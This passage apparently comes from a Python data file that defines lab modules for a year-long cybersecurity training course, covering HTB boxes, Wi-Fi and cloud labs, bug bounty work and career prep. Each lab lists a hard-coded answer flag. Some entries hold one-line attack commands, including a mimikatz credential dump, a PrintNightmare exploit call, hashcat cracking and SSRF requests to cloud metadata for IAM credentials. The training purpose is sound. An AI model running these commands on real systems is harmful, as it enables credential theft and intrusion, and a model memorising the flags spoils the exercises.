    _lab("Complete Medium-rated boxes.", "Intermediate challenge.", ["Chaining vulns", "Pivot techniques", "Custom exploits"],
        [("thm", "https://tryhackme.com", "Pick Medium rooms")],
        "Complete 3 Medium rooms independently. Submit all flags.", "None", "FLAG{thm_m3d1um_pr0}", 150),
    _lab("Complete Hard-rated boxes and write professional pentest reports.", "Report-quality work.",
        ["Professional reports", "CVSS scoring", "Remediation advice"],
        [("report", "Use provided template", "Pentest report format")],
        "Complete 2 Hard rooms. Write full pentest reports. Submit.", "None", "FLAG{thm_h4rd_r3p0rt}", 200)),

804: _m(804, "HTB Starting Point", TYPE_EXTERNAL, 3,
    _lab("Complete HackTheBox Starting Point Tier 1 & 2.", "Real-world machine hacking.",
        ["Enumeration", "Web exploitation", "Privilege escalation"], [("htb", "https://app.hackthebox.com/starting-point", "Starting Point")],
        "STEP 1: Sign up at hackthebox.com.\nSTEP 2: Complete Tier 1 & 2.\nSTEP 3: Submit flags.", "None", "FLAG{htb_st4rt_34sy}", 100),
    _lab("Complete without walkthrough, document methodology.", "Independent HTB work.",
        ["Custom methodology", "Tool chaining", "Documentation"], [("htb", "https://app.hackthebox.com", "HTB platform")],
        "Complete Tier 2 without guides. Document everything. Submit.", "None", "FLAG{htb_t13r2_pr0}", 150),
    _lab("Speed-complete Tier 1-2 and start Easy machines.", "Efficient pentesting.",
        ["Speed methodology", "Automation scripts", "Quick enumeration"], [("autorecon", "autorecon target_IP", "Automated recon")],
        "Speed-run Starting Point. Begin Easy machines. Submit.", "None", "FLAG{htb_sp33d_3l1t3}", 200)),

805: _m(805, "HTB Easy Linux Boxes", TYPE_EXTERNAL, 3,
    _lab("Root 3 Easy Linux HTB machines. Write report for each.", "Full machine pentesting.",
        ["Full pentest methodology", "Report writing", "Attack chain documentation"],
        [("htb", "https://app.hackthebox.com", "Easy Linux machines")],
        "Root 3 machines. Write reports. Submit.", "None", "FLAG{htb_l1nux_34sy}", 125),
    _lab("Root without Metasploit. Manual exploitation only.", "Manual exploitation skills.",
        ["Manual exploit compilation", "Custom scripts", "No Metasploit"], [("msfconsole", "DO NOT USE", "Manual only")],
        "Root 3 machines manually. No Metasploit. Submit.", "None", "FLAG{htb_m4nu4l_pr0}", 175),
    _lab("Root in under 2 hours each. OSCP-style time pressure.", "Exam-condition pentesting.",
        ["Time management", "Methodology efficiency", "Quick decision making"], [("timer", "Start 2-hour timer per box", "Track time")],
        "Root 3 machines under timer. Write reports. Submit.", "None", "FLAG{htb_sp33d_3l1t3}", 200)),

806: _m(806, "HTB Easy Windows Boxes", TYPE_EXTERNAL, 3,
    _lab("Root 3 Easy Windows HTB machines using WinRM, Evil-WinRM.", "Windows pentesting basics.",
        ["WinRM/Evil-WinRM", "Windows enumeration", "Token impersonation"],
        [("evil-winrm", "evil-winrm -i target -u user -p pass", "Windows remote shell"),
         ("winpeas", "./winPEASx64.exe", "Windows privilege escalation")],
        "Connect with Evil-WinRM. Enumerate with winPEAS. Escalate. Submit.", "None", "FLAG{w1n_htb_34sy}", 125),
    _lab("Exploit PrintNightmare and other Windows CVEs.", "Windows CVE exploitation.",
        ["PrintNightmare", "EternalBlue", "Zerologon"], [("printnightmare", "python3 CVE-2021-1675.py", "PrintNightmare exploit")],
        "Identify Windows CVE. Exploit without Metasploit. Submit.", "None", "FLAG{w1n_cv3_pr0}", 175),
    _lab("Full AD compromise on Windows boxes.", "Enterprise Windows attack chain.",
        ["Kerberoasting", "Pass-the-Hash", "Golden Ticket"], [("mimikatz", "mimikatz.exe sekurlsa::logonpasswords", "Credential dump")],
        "Complete AD attack chain. Domain Admin. Submit.", "None", "FLAG{w1n_4d_3l1t3}", 200)),

# ═══ PHASE 4: CAREER (Days 271-365) ═══
901: _m(901, "Wireless Hacking Lab", TYPE_LAB, 4,
    docker_image="wifi_lab", container="cybersim_wifi_target",
    easy=_lab("A WPA2 Handshake has been captured from the target corporate network. Crack it offline.",
        "Parse the PMKID, extract the hash, and crack it with hashcat.", ["hashcat -m 16800", "Dictionary Attack"],
        [("hashcat", "hashcat -m 16800 hash.txt wordlist.txt", "Advanced password recovery")],
        "STEP 1: Go to the web portal on port 80.\nSTEP 2: Note the generated PMKID hash format (Hashcat 16800).\nSTEP 3: Save it as hash.txt.\nSTEP 4: Run hashcat to crack it.\nSTEP 5: Submit the password back to the server to get flag.",
        "None — Offline cracking", "FLAG{wifi_cracked_default}", 150),
    normal=_lab("Crack without the provided wordlist, using rules.", "Use rule-based cracking.",
        ["Hashcat rules", "Custom wordlists"], [("rules", "hashcat -r best64.rule", "Rule attack")],
        "STEP 1: Download the hash.\nSTEP 2: Use rockyou.txt with rules to crack.\nSTEP 3: Submit.", "None", "FLAG{wifi_cracked_default}", 175),
    hard=_lab("Provide a full write-up of the decryption process.", "Write-up.",
        ["Reporting", "Decryption explanation"], [("report", "Write report", "Documentation")],
        "Write full report on Hashcat modes and PBKDF2. Submit flag.", "None", "FLAG{wifi_cracked_default}", 200)),

902: _m(902, "Cloud Pentesting Lab", TYPE_LAB, 4,
    docker_image="cloud_lab", container="cybersim_cloud_target",
    easy=_lab("Target hosts infrastructure on AWS with an image fetcher app (port 80) and S3 bucket.",
        "Exploit SSRF to access AWS IMDS and enumerate S3.", ["SSRF to IMDS", "S3 Bucket Enumeration"],
        [("curl", "curl 'http://target/fetch?url=http://127.0.0.1:8080/latest/meta-data/'", "SSRF Exploitation")],
        "STEP 1: Access port 80.\nSTEP 2: Use the fetcher to query localhost:8080.\nSTEP 3: Read metadata to find IAM credentials or S3 bucket names.\nSTEP 4: Extract the flag.txt. Submit.",
        "Basic Cloud Config", "FLAG{cloud_s3_default}", 150),
    normal=_lab("Extract AWS temporary credentials via IMDS.", "Get AWS credentials through SSRF.",
        ["AWS IMDSv1", "IAM Roles"], [("metadata", "/latest/meta-data/iam/security-credentials/", "IMDS")],
        "STEP 1: Exploit SSRF.\nSTEP 2: Request IAM security credentials.\nSTEP 3: Extract the AccessKeyId, SecretAccessKey, and Token (which contains the flag). Submit.",
        "IMDS accessible without v2 token", "FLAG{cloud_imds_default}", 175),
    hard=_lab("Simulate privilege escalation via stolen cloud credentials.", "Cloud privilege escalation.",
        ["Cloud permissions enum", "AWS CLI"], [("aws", "aws sts get-caller-identity", "AWS CLI")],
        "Use the stolen credentials to find a way to escalate privileges. Submit flag.", "None", "FLAG{cloud_imds_default}", 200)),

903: _m(903, "Brand Building & Portfolio", TYPE_CAREER, 4,
    _lab("Set up GitHub Pages blog. Upload your write-ups and tools.", "Build your online presence.",
        ["GitHub Pages setup", "Markdown blogging", "Portfolio curation"],
        [("github", "git init && git remote add origin ...", "Set up repo"), ("jekyll", "gem install jekyll", "Blog framework")],
        "STEP 1: Create GitHub repo: username.github.io\nSTEP 2: Add index.md with your profile.\nSTEP 3: Upload 3 write-ups from THM/HTB.\nSTEP 4: Push Python tools from Month 3.\nSTEP 5: Submit your GitHub URL as flag.",
        "None", "FLAG{p0rtf0l10_cr34t3d}", 50),
    _lab("Create polished write-ups with screenshots and methodology.", "Professional documentation.",
        ["Technical writing", "Screenshot annotation", "Methodology documentation"], [("obsidian", "Use Obsidian for notes", "Note-taking tool")],
        "Create 5 polished write-ups. Each with: summary, methodology, screenshots, lessons learned. Submit.",
        "None", "FLAG{pr0_wr1t3ups}", 75),
    _lab("Build a personal brand: blog posts, LinkedIn, speaking.", "Industry networking.",
        ["LinkedIn optimization", "Community engagement", "Conference prep"], [("linkedin", "Optimize your profile", "Professional network")],
        "Write 3 original security blog posts. Engage on LinkedIn/Twitter. Submit.", "None", "FLAG{br4nd_bu1lt}", 100)),

904: _m(904, "Bug Bounty Recon", TYPE_LAB, 4,
    easy=_lab("Pick a HackerOne VDP. Map the entire attack surface using passive recon.",
        "Learn bug bounty reconnaissance.", ["Subdomain enumeration", "Tech stack identification", "Asset discovery"],
        [("sublist3r", "sublist3r -d target.com", "Subdomain enum"), ("whatweb", "whatweb target.com", "Tech stack ID"),
         ("amass", "amass enum -passive -d target.com", "Comprehensive recon")],
        "STEP 1: Pick a target from hackerone.com/programs.\nSTEP 2: Enumerate subdomains: sublist3r, amass.\nSTEP 3: Check tech stack: whatweb, wappalyzer.\nSTEP 4: Map all endpoints.\nSTEP 5: Document findings. Submit flag.",
        "None — Real target, follow rules!", "FLAG{bb_r3c0n_34sy}", 100),
    normal=_lab("Advanced recon: JS analysis, API discovery, cloud asset enumeration.",
        "Deep reconnaissance techniques.", ["JS file analysis", "API endpoint discovery", "Cloud bucket enumeration"],
        [("linkfinder", "python3 linkfinder.py -i https://target.com/app.js", "Extract URLs from JS"),
         ("gau", "gau target.com | grep api", "Historical URL discovery")],
        "Find hidden APIs, cloud assets, and undocumented endpoints. Submit.", "None", "FLAG{d33p_r3c0n_pr0}", 150),
    hard=_lab("Fully automated recon pipeline with custom tools.", "Build recon automation.",
        ["Custom recon framework", "CI/CD recon pipeline", "Notification on new assets"],
        [("notify", "notify -silent -bulk", "Send results to Slack/Discord"), ("nuclei", "nuclei -t cves/ -l urls.txt", "Auto vuln scan")],
        "Build automated recon pipeline. Run against target. Submit.", "None", "FLAG{4ut0_r3c0n_3l1t3}", 200)),

905: _m(905, "Bug Bounty Hunting", TYPE_LAB, 4,
    easy=_lab("Search for low-hanging fruit: subdomain takeovers, information disclosure, IDORs.",
        "Find your first real bug.", ["Subdomain takeover", "IDOR testing", "Information disclosure"],
        [("subjack", "subjack -w subs.txt -t 100 -ssl", "Check subdomain takeover"),
         ("idor", "Change id=1 to id=2 in API endpoints", "Test for IDOR")],
        "STEP 1: Check for subdomain takeover.\nSTEP 2: Test all API endpoints for IDOR.\nSTEP 3: Check for exposed .git, .env, backup files.\nSTEP 4: Document and report findings. Submit flag.",
        "None — Follow responsible disclosure!", "FLAG{f1rst_bug_34sy}", 100),
    normal=_lab("Intermediate bugs: SSRF, authentication bypass, race conditions.",
        "Find medium-severity bugs.", ["SSRF testing", "Auth bypass", "Race conditions"],
        [("ssrf", "http://target/fetch?url=http://169.254.169.254/", "SSRF to cloud metadata"),
         ("turbo", "Turbo Intruder for race conditions", "Burp extension")],
        "Test for SSRF, auth bypass, race conditions. Report. Submit.", "None", "FLAG{m3d_bug_pr0}", 150),
    hard=_lab("Critical bugs: RCE, SQL injection, authentication chain attacks.",
        "Hunt for critical vulnerabilities.", ["RCE chains", "Blind SQLi", "Auth chain attacks"],
        [("nuclei", "nuclei -t critical/ -l endpoints.txt", "Auto-check critical vulns")],
        "Find and report critical bugs. Full chain exploitation. Submit.", "None", "FLAG{cr1t_bug_3l1t3}", 200)),

906: _m(906, "Resume & Interview Prep", TYPE_CAREER, 4,
    _lab("Build a 1-page resume focused on skills, portfolio, and CyberSim.", "Create your resume.",
        ["Resume formatting", "Skills highlighting", "Portfolio linking"],
        [("template", "Use provided Markdown template", "Resume template")],
        "STEP 1: List: skills, tools, certifications, projects.\nSTEP 2: Format as 1-page PDF.\nSTEP 3: Include GitHub link.\nSTEP 4: Submit resume hash as flag.",
        "None", "FLAG{r3sum3_r34dy}", 50),
    _lab("Tailor resume for specific roles and write cover letters.", "Targeted applications.",
        ["SOC Analyst resume", "Pentest resume", "AppSec resume"], [("indeed", "Search job requirements", "Study job postings")],
        "Create 3 tailored resumes for different roles. Submit.", "None", "FLAG{t41l0r3d_r3sum3}", 75),
    _lab("Mock interviews with AI Mentor. Technical + behavioral.", "Interview preparation.",
        ["Technical questions", "Behavioral STAR method", "Salary negotiation"],
        [("mentor", "Ask AI Mentor for mock interview", "Practice with AI")],
        "Complete 5 mock interviews with Mentor. Submit.", "None", "FLAG{1nt3rv13w_pr3p}", 100)),

907: _m(907, "Mock Technical Interviews", TYPE_CAREER, 4,
    _lab("Answer: 'Explain XSS to a 5-year-old', 'What happens when you type google.com?'",
        "Master common security interview questions.", ["XSS explanation", "DNS resolution", "Incident response"],
        [("mentor", "Ask AI Mentor interview questions", "Practice")],
        "Practice 10 common questions with Mentor. Submit.", "None", "FLAG{t3ch_1nt3rv13w}", 50),
    _lab("Whiteboard: Design a secure network, explain a pentest methodology.",
        "Technical whiteboard interviews.", ["Network design", "Methodology explanation", "Architecture review"],
        [("mentor", "Whiteboard practice with AI Mentor", "Design exercises")],
        "Complete 5 whiteboard exercises. Submit.", "None", "FLAG{wh1t3b04rd_pr0}", 75),
    _lab("Live hacking demo: Exploit a machine during interview under pressure.",
        "Demonstrate skills under observation.", ["Live CTF", "Explaining methodology while hacking", "Time pressure"],
        [("htb", "Root a machine while explaining your process", "Live demo")],
        "Root a machine while recording your explanation. Submit.", "None", "FLAG{l1v3_h4ck_3l1t3}", 100)),

908: _m(908, "The Job Hustle", TYPE_CAREER, 4,
    _lab("Apply to 10 jobs per day. Jr Pentester, SOC Analyst L1, AppSec Engineer.",
        "Active job hunting.", ["Job boards", "LinkedIn outreach", "Recruiter networking"],
        [("linkedin", "Connect with security recruiters", "Networking"), ("indeed", "Indeed/LinkedIn Jobs", "Search")],
        "Apply to 10 jobs. Track in spreadsheet. Submit.", "None", "FLAG{j0b_hunt_34sy}", 50),
    _lab("Customize each application. Follow up with hiring managers.",
        "Strategic job hunting.", ["Personalized applications", "Follow-up emails", "Portfolio presentation"],
        [("email", "Draft follow-up templates", "Communication")],
        "Send 5 personalized applications with custom cover letters. Submit.", "None", "FLAG{str4t3g1c_hunt}", 75),
    _lab("Network at conferences, CTFs, and meetups. Build real connections.",
        "Industry networking.", ["Conference attendance", "CTF competitions", "Community contribution"],
        [("ctf", "CTFtime.org for upcoming CTFs", "Competition"), ("meetup", "Local security meetups", "Networking")],
        "Attend 1 event, compete in 1 CTF, connect with 5 professionals. Submit.", "None", "FLAG{n3tw0rk_3l1t3}", 100)),

909: _m(909, "🎉 Graduation Day", TYPE_CAREER, 4,
    _lab("You made it! 365 days of cybersecurity training complete.",
        "Reflect on your journey and celebrate.", ["Reflection", "Goal setting", "Community giveback"],
        [("celebrate", "You are no longer a Script Kiddie!", "🎉")],
        "Write a reflection on your 365-day journey. Set goals for Year 2. Submit.", "None", "FLAG{3l1t3_0p3r4t0r_gr4du4t3d}", 500),
    _lab("Mentor a beginner. Share your knowledge.", "Give back to the community.",
        ["Mentoring", "Write-up sharing", "Teaching"], [("mentor", "Help someone on Discord/Reddit", "Community")],
        "Help 3 beginners with their security questions. Document. Submit.", "None", "FLAG{m3nt0r_m0d3}", 750),
    _lab("You are Elite. Welcome to the industry. The journey never ends.",
        "Continue growing. Target advanced certs, bug bounties, research.", ["OSCP/OSCE", "CVE research", "0-day hunting"],
        [("research", "Start vulnerability research", "Advanced career")],
        "Set 5 goals for next year. Start a security research project. Submit.", "None", "FLAG{z3r0_d4y_hunt3r}", 1000)),
}
